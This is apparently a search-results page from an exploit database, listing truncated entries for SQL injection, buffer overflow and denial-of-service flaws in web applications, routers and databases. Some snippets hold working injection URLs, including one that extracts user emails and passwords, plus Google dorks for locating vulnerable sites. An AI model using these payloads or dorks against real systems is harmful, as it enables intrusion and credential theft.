2291 matches found
sNews 1.7 - (index.php?category) SQL Injection Vulnerability
No description provided by source. sNews v1.7 index.php?category SQL Injection Vulnerability Author : CoBRa21 Author Web Page : http://www.ipbul.org Dork: Powered by sNews Sql Injection: http://localhost/path/index.php?category=-3 union select 0,version,2,3,4,5,6,7,8 Thanks http://e-banka.org &...
Linksys Devices 1.42/1.43 GET Request Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6301/info Several Linksys Broadband Router devices are prone to a buffer overflow conditions. The vulnerability occurs due to insufficient allocation of memory for buffers. An attacker can exploit this vulnerability by...
WordPress Contact Form plugin <= 2.7.5 - SQL Injection
No description provided by source. Exploit Title: WordPress Contact Form plugin = 2.7.5 SQL Injection Vulnerability Date: 2011-10-13 Author: Skraps jackie.craig.sparksatlive.com jackie.craig.sparksatgmail.com @skrapsfoo Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.z...
MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/23911/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. An attacker can exploit this issue to crash the application, denying access to legitimate...
Infront SQL Injection Vulnerability
No description provided by source. Exploit Title: Infront SQL Injection Vulnerability Date: 12-06-2010 Author: TheMaster [email protected] Software Link: http://www.infront.com/ Version: N/A Tested on: Windows XP SP3 Author : TheMaster [email protected] Dork : intext:Powered by Infront Type of attack :...
Koobi Pro 6.1 - Gallery (img_id)
No description provided by source. Koobi Pro v6.1 gallery imgid AUTHOR : BILGEKAGAN HOME : http://www.1923turk.biz DORK 1 : allinurl: index.php?p=gallerypic imgid EXPLOiT: index.php?p=gallerypic&imgid=-1+union+select+0,1,2,concatemail,0x3a,pass,4,5,6,7,8+from+kpro6user aDMN PANEL: admin/login.php...
WordPress Photoracer plugin <= 1.0 - SQL Injection Vulnerability
No description provided by source. Exploit Title: WordPress Photoracer plugin = 1.0 SQL Injection Vulnerability Google Dork: inurl:wp-content/plugins/photoracer/viewimg.php Date: 2011-08-26 Author: evilsocket evilsocket at gmail dot com Software Link: http://wordpress.org/extend/plugins/photorace...
Gravity Board X 2.0 BETA (Public Release 3) - SQL Injection Vulnerability
No description provided by source. !/usr/bin/perl Exploit Title: Gravity Board X 2.0 BETA Public Release 3 SQL INJECTION Date: 26.02.2010 Author: Ctacok Software Link: http://www.gravityboardx.com/ Version: 2.0 BETA Public Release 3 Tested on: Windows SP 3 Code : exploit code use LWP::Simple; pri...
MySQL 3.23.x mysqld Privilege Escalation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7052/info A vulnerability has been discovered for MySQL that may allow the mysqld service to start with elevated privileges. An attacker can exploit this vulnerability by creating a DATADIR/my.cnf that includes the line...
Pre Shopping Mall 1.0 - Remote SQL Injection Vulnerability
No description provided by source. ============================================== Pre Shopping Mall v1.0 Remote SQL Injection ============================================== Found: Cyber-Security.org ============================================== Exploit:...
RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC
No description provided by source. !/usr/bin/python RPM Select/Elite v5.0 .xml config parsing unicode buffer overflow PoC Found by: mrme - http://net-ninja.net/ Homepage: http://lpd.brooksnet.com/ Download: http://www.brooksnet.com/download-rpmselect Tested on: Windows XP SP3 Advisory:...
Wordpress Plugin Glossary - SQL Injection
No description provided by source. Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability Date: 2011-30-10 Author: longrifle0x software: Wordpress Download: http://wordpress.org/extend/plugins/wp-glossary/ Tools: SQLMAP DESCRIPTIONDiscovered a vulnerability in WP Glossary,...
RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/27742/info RPM Remote Print Manager is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into an insufficiently sized buffer. An attacker may...
WSN Links SQL Injection Vulnerability
No description provided by source. 'WSN Links' SQL Injection Vulnerability CVE-2010-4006 Mark Stanislav - [email protected] I. DESCRIPTION --------------------------------------- A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assemblin...
Webspell 4.x - safe_query Bypass Vulnerability
No description provided by source. INFORMATION +Name : Webspell 4.X safequery bypass Vulnerability +Author : silent vapor +Date : 29.09.2010 +Script : webspell +Price : free +Language :PHP +Discovered by silent vapor +Underground Agents +Greetz to Team-Internet, 4004-Security-Project, Easy Laster...
phpMDJ 1.0.3 - SQL Injection Vulnerability
No description provided by source. ,--------------------------------------------------------------, Vulnerable Script : phpMDJ 1.0.3 \ Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip \ Vulnerability : Remote Sql Injection ...
MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22900/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata. An attacker can exploit this issue to crash the application, denying access ...
MaxWebPortal 1.3 pic_popular.asp SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries...
Ballettin Forum SQL Injection Vulnerability
No description provided by source. ==================================================================== Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability Date: 25/07/2010 Author: 3v0 aka evolution evolution ^ darkedition.com Software Link: http://www.ballettin.com Tested on:...
PostgreSQL <= 8.4.1 JOIN Hashtable Size Integer Overflow Vulnerability
Exploit for multiple platform in category dos / poc PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations. An attacker can exploit this issue to cause the affected application to...